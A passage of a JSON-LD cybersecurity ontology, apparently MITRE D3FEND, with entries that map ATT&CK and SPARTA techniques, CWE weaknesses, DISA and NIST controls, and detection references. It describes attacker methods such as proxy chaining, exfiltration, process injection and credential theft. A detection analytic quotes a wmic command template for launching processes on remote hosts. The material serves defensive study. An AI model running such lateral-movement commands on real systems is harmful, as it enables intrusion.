      "d3f:definition": "The information system, for biometric-based authentication, employs mechanisms that satisfy organization-defined biometric quality requirements.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:BiometricAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002005"
    },
    {
      "@id": "d3f:DS0019",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in",
      "d3f:exactly": {
        "@id": "d3f:ServiceApplicationProcess"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Service Metadata component",
      "rdfs:label": "Service (ATT&CK DS)"
    },
    {
      "@id": "d3f:CCI-001297_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system detects unauthorized changes to software and information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001297"
    },
    {
      "@id": "d3f:T1090.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1090.003",
      "d3f:definition": "Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Multi-hop Proxy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1090"
        },
        {
          "@id": "_:N62a175c92a714d0ebf90c0ea801faa17"
        }
      ]
    },
    {
      "@id": "_:N62a175c92a714d0ebf90c0ea801faa17",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ATTACKICSCommandAndControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0101"
      },
      "rdfs:label": "Command and Control Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Nc3689730a9c74926913151fe5b846ee0"
        }
      ],
      "skos:prefLabel": "Command and Control Technique"
    },
    {
      "@id": "_:Nc3689730a9c74926913151fe5b846ee0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0101"
      }
    },
    {
      "@id": "d3f:CCI-000768_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for local access to non-privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000768"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-24_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Control Decisions | Transmit Access Authorization Information",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "AC-24(1)"
    },
    {
      "@id": "d3f:AccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AccessMediation"
      ],
      "d3f:d3fend-id": "D3-AMED",
      "d3f:definition": "Access mediation is the process of granting or denying specific requests to: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities (e.g., Federal buildings, military establishments, border crossing entrances). Access mediation decisions should enforce least privilege by granting access for scoped durations to prevent privilege creep and, where applicable, implement just-in-time (JIT) access. Denial decisions may prevent initial access or terminate access that has already been granted, ensuring continuous enforcement of security policies.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CNNSI-4009"
      },
      "d3f:synonym": "Access Control",
      "rdfs:label": "Access Mediation",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Access_control"
        },
        {
          "@id": "https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=1451869"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.201-2.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1.pdf"
        },
        {
          "@id": "https://www.cs.cmu.edu/afs/cs/usr/bsy/security/CSC-STD-001-83.txt"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Naa5d6480938f4cbd9ee12bb4261325b5"
        }
      ]
    },
    {
      "@id": "_:Naa5d6480938f4cbd9ee12bb4261325b5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "d3f:T1491.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1491.002",
      "d3f:definition": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)",
      "d3f:modifies": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:label": "External Defacement",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1491"
        },
        {
          "@id": "_:N8ddd270281c74f43ac791eaaf94f2166"
        }
      ]
    },
    {
      "@id": "_:N8ddd270281c74f43ac791eaaf94f2166",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:contained-by",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "d3f:definition": "x contained-by y: The entity x exists within or is physically or logically enclosed by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:contains"
      },
      "rdfs:label": "contained-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-contained-by"
        }
      ]
    },
    {
      "@id": "d3f:T1634",
      "@type": "owl:Class",
      "d3f:attack-id": "T1634",
      "d3f:definition": "Adversaries may search common password storage locations to obtain user credentials. Passwords can be stored in several places on a device, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users to manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
      "rdfs:label": "Credentials from Password Store - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "Credentials from Password Store"
    },
    {
      "@id": "d3f:CWE-787",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-787",
      "d3f:definition": "The product writes data past the end, or before the beginning, of the intended buffer.",
      "d3f:synonym": "Memory Corruption",
      "d3f:weakness-of": {
        "@id": "d3f:RawMemoryAccessFunction"
      },
      "rdfs:label": "Out-of-bounds Write",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "_:Nca5344a59ced4a6b9a9d1a3ae83f7118"
        }
      ]
    },
    {
      "@id": "_:Nca5344a59ced4a6b9a9d1a3ae83f7118",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RawMemoryAccessFunction"
      }
    },
    {
      "@id": "d3f:OTDeviceDescriptionMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Describe features, abilities, or performance of system components.",
      "rdfs:label": "OT Device Description Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:Nbd9be6b445804df4934060f956e9f44e"
        }
      ]
    },
    {
      "@id": "_:Nbd9be6b445804df4934060f956e9f44e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceDescriptionMessage"
      }
    },
    {
      "@id": "d3f:ATTACKMobileThing",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Mobile Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKThing"
      }
    },
    {
      "@id": "d3f:T1011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1011",
      "d3f:definition": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Exfiltration Over Other Network Medium",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:Ne20b06e8abad463cae063b372628c296"
        }
      ]
    },
    {
      "@id": "_:Ne20b06e8abad463cae063b372628c296",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-625",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-625",
      "d3f:definition": "The product uses a regular expression that does not sufficiently restrict the set of allowed values.",
      "rdfs:label": "Permissive Regular Expression",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-185"
      }
    },
    {
      "@id": "d3f:TraceProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A trace system call provides a means by which one process (the \"tracer\") may observe and control the execution of another process (the \"tracee\"), and examine and change the tracee's memory and registers. It is primarily used to implement breakpoint debugging and system call tracing.",
      "d3f:monitors": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Trace Process",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/resource/Ptrace"
        },
        {
          "@id": "https://linux.die.net/man/2/ptrace"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N766c5a9348194c2c80a4500d728420b0"
        }
      ],
      "skos:altLabel": "Open Process"
    },
    {
      "@id": "_:N766c5a9348194c2c80a4500d728420b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:T1193",
      "@type": "owl:Class",
      "d3f:attack-id": "T1193",
      "d3f:definition": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1566.001",
      "rdfs:label": "Spearphishing Attachment",
      "rdfs:seeAlso": {
        "@id": "d3f:T1566.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:T1055.015",
      "@type": "owl:Class",
      "d3f:attack-id": "T1055.015",
      "d3f:definition": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.",
      "rdfs:label": "ListPlanting",
      "rdfs:subClassOf": {
        "@id": "d3f:T1055"
      }
    },
    {
      "@id": "d3f:CWE-150",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-150",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as escape, meta, or control character sequences when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Escape, Meta, or Control Sequences",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:REC-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0002",
      "d3f:definition": "Threat actors compile a concise but highly actionable dossier of “who/what/where/when” attributes about the spacecraft and mission. Descriptors include identity elements (mission name, NORAD catalog number, COSPAR international designator, call signs), mission class and operator, country of registry, launch vehicle and date, orbit regime and typical ephemerides, and any publicly filed regulatory artifacts (e.g., ITU/FCC filings). They also harvest operational descriptors such as ground network affiliations, common pass windows by latitude band, and staffing patterns implied by press, social media, and schedules. Even when each item is benign, the aggregate picture enables precise timing (e.g., during beta-angle peaks, eclipse seasons, or planned maintenance), realistic social-engineering pretexts, and better targeting of ground or cloud resources that support the mission.",
      "rdfs:label": "Gather Spacecraft Descriptors - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Spacecraft Descriptors"
    },
    {
      "@id": "d3f:UserDataTransferAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserDataTransferAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:ResourceAccess"
      },
      "d3f:d3fend-id": "D3-UDTA",
      "d3f:definition": "Analyzing the amount of data transferred by a user.",
      "d3f:kb-article": "## How it works\nUnusual data transfer activity may indicate unauthorized activity. Data transfers can be analyzed by collecting network traffic or application logs.\n\n## Considerations\n* There is a potential for false positives from anomalies that are not associated with unauthorized activity.\n* Attackers that move low and slow may not differentiate their data transfer behavior enough for an alert to trigger.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-SystemAndMethodThereofForIdentifyingAndRespondingToSecurityIncidentsBasedOnPreemptiveForensics_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingThreatAndRiskAssessmentOfAsset-actorInteractions_VECTRANETWORKSInc"
        }
      ],
      "rdfs:label": "User Data Transfer Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N67415414a1234e49838a6fafd3c281de"
        }
      ]
    },
    {
      "@id": "_:N67415414a1234e49838a6fafd3c281de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResourceAccess"
      }
    },
    {
      "@id": "d3f:CWE-782",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-782",
      "d3f:definition": "The product implements an IOCTL with functionality that should be restricted, but it does not properly enforce access control for the IOCTL.",
      "rdfs:label": "Exposed IOCTL with Insufficient Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-749"
      }
    },
    {
      "@id": "d3f:may-be-associated-with",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-be-associated-with y: The subject x and object y may be associated in some way.",
      "rdfs:label": "may-be-associated-with",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13804981-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:Reference-DetectingScript-basedMalware_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190188384A1"
      },
      "d3f:kb-abstract": "Described herein are systems, techniques, and computer program products for preventing execution, by a scripting engine, of harmful commands that may be introduced by computer malware or other mechanisms. The system identifies certain host processes that may attempt to utilize a hosted scripting engine. An unmanaged interface module is injected into an identified host process. The unmanaged interface module is configured to detect certain conditions indicating the likelihood that a scripting engine will be instantiated, and in response to inject a managed interface module into the host process. The managed interface module hooks into certain methods of the scripting engine to intercept commands before they are executed by the scripting engine. The managed and unmanaged interface components then communicate with a kernel-mode threat detection component to determine whether any commands should be blocked.",
      "d3f:kb-author": "Ion-Alexandru IONESCU; Satoshi Tanda",
      "d3f:kb-mitre-analysis": "The patent describes techniques that can be implemented to detect and block malicious commands and command scripts from being executed by scripting engines.\n\n### Script Execution Monitoring explanation\nThis patent describes software installed on the host system that hooks into methods of a scripting engine to intercept commands before they are executed and block commands if they are determined to be harmful. For example, regular expression checking may be used to identify commands having malicious patterns. Expression checking may be used for script files as well as interactively typed commands.\n\n### File Content Signatures explanation\nThis patent includes File Content Signatures because in the case of a script file, a hash of the file is compared against hashes of known malicious script files to determine whether the script file is malicious.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:FileContentRules"
        },
        {
          "@id": "d3f:ScriptExecutionAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Detecting script-based malware",
      "rdfs:label": "Reference - Detecting script-based malware - Crowdstrike Inc"
    },
    {
      "@id": "d3f:CWE-420",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-420",
      "d3f:definition": "The product protects a primary channel, but it does not use the same level of protection for an alternate channel.",
      "rdfs:label": "Unprotected Alternate Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:T1529",
      "@type": "owl:Class",
      "d3f:attack-id": "T1529",
      "d3f:definition": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)",
      "rdfs:label": "System Shutdown/Reboot",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:TicketGrantingTicket",
      "@type": "owl:Class",
      "d3f:definition": "In some computer security systems, a Ticket Granting Ticket or Ticket to Get Tickets (TGT) is a small, encrypted identification file with a limited validity period. After authentication, this file is granted to a user for data traffic protection by the key distribution center (KDC) subsystem of authentication services such as Kerberos. The TGT file contains the session key, its expiration date, and the user's IP address, which protects the user from man-in-the-middle attacks. The TGT is used to obtain a service ticket from Ticket Granting Service (TGS). User is granted access to network services only after this service ticket is provided.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Ticket_Granting_Ticket"
      },
      "rdfs:label": "Ticket Granting Ticket",
      "rdfs:seeAlso": {
        "@id": "dbr:Charlie_and_the_Chocolate_Factory"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AccessToken"
      },
      "skos:altLabel": "Golden Ticket"
    },
    {
      "@id": "d3f:T1665",
      "@type": "owl:Class",
      "d3f:attack-id": "T1665",
      "d3f:definition": "Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.",
      "rdfs:label": "Hide Infrastructure",
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:T1481",
      "@type": "owl:Class",
      "d3f:attack-id": "T1481",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
      "rdfs:label": "Web Service - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Web Service"
    },
    {
      "@id": "d3f:CWE-484",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-484",
      "d3f:definition": "The product omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition.",
      "rdfs:label": "Omitted Break Statement in Switch",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-670"
        },
        {
          "@id": "d3f:CWE-710"
        }
      ]
    },
    {
      "@id": "d3f:CWE-764",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-764",
      "d3f:definition": "The product locks a critical resource more times than intended, leading to an unexpected state in the system.",
      "rdfs:label": "Multiple Locks of a Critical Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-667"
        },
        {
          "@id": "d3f:CWE-675"
        }
      ]
    },
    {
      "@id": "d3f:T1059.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.010",
      "d3f:definition": "Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)",
      "rdfs:label": "AutoHotKey & AutoIT",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaWMI_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-12-001/"
      },
      "d3f:kb-abstract": "Adversaries can use Windows Management Instrumentation (WMI) to move laterally by launching executables remotely. For adversaries to achieve this, they must open a WMI connection to a remote host. This RPC activity is currently detected by CAR-2014-11-007. After the WMI connection has been initialized, a process can be remotely launched using the command: wmic /node:\"<hostname>\" process call create \"<command line>\", which is detected via CAR-2016-03-002.\n\nThis leaves artifacts at both a network (RPC) and process (command line) level. When wmic.exe (or the schtasks API) is used to remotely create processes, Windows uses RPC (135/tcp) to communicate with the remote machine.\n\nAfter RPC authenticates, the RPC endpoint mapper opens a high port connection, through which the schtasks Remote Procedure Call is actually implemented. With the right packet decoders, or by looking for certain byte streams in raw data, these functions can be identified.\n\nWhen the command line is executed, it has the parent process of C:\\windows\\system32\\wbem\\WmiPrvSE.exe. This analytic looks for these two events happening in sequence, so that the network connection and target process are output.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ProcessLineageAnalysis"
        },
        {
          "@id": "d3f:RPCTrafficAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2014-12-001: Remotely Launched Executables via WMI",
      "rdfs:label": "Reference - CAR-2014-12-001: Remotely Launched Executables via WMI - MITRE"
    },
    {
      "@id": "d3f:AML.T0019",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0019",
      "d3f:definition": "Adversaries may [Poison Training Data](/techniques/AML.T0020) and publish it to a public location.\nThe poisoned dataset may be a novel dataset or a poisoned variant of an existing open source dataset.\nThis data may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010).",
      "rdfs:label": "Publish Poisoned Datasets - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0019"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Publish Poisoned Datasets"
    },
    {
      "@id": "d3f:FileSetAttributesEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file's metadata attributes are modified, such as changing its timestamps, labels, or categorization within the system.",
      "rdfs:label": "File Set Attributes Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Na3fc2200148042d08a55d4073e9e7a3f"
        },
        {
          "@id": "_:N79c7fe0b42754a6c98faeffd8516f7d7"
        }
      ]
    },
    {
      "@id": "_:Na3fc2200148042d08a55d4073e9e7a3f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "_:N79c7fe0b42754a6c98faeffd8516f7d7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:T1036.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.005",
      "d3f:definition": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.",
      "d3f:invokes": {
        "@id": "d3f:MoveFile"
      },
      "d3f:may-create": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Match Legitimate Resource Name or Location",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:N011a7e46e73c448cbfdfe61d648f446b"
        },
        {
          "@id": "_:N15238600e7734abebfed69cd9bba560c"
        }
      ]
    },
    {
      "@id": "_:N011a7e46e73c448cbfdfe61d648f446b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MoveFile"
      }
    },
    {
      "@id": "_:N15238600e7734abebfed69cd9bba560c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-925",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-925",
      "d3f:definition": "The Android application uses a Broadcast Receiver that receives an Intent but does not properly verify that the Intent came from an authorized source.",
      "d3f:synonym": "Intent Spoofing",
      "rdfs:label": "Improper Verification of Intent by Broadcast Receiver",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-940"
      }
    },
    {
      "@id": "d3f:CCI-000047_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system delays next login prompt according to the organization-defined delay algorithm, when the maximum number of unsuccessful attempts is exceeded, automatically locks the account/node for an organization-defined time period or locks the account/node until released by an Administrator IAW organizational policy.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000047"
    },
    {
      "@id": "d3f:T1547.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.005",
      "d3f:definition": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Security Support Provider",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Nbb50c8c0612d4a8ea8038bfae55e9ef5"
        }
      ]
    },
    {
      "@id": "_:Nbb50c8c0612d4a8ea8038bfae55e9ef5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:SystemPlatformVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
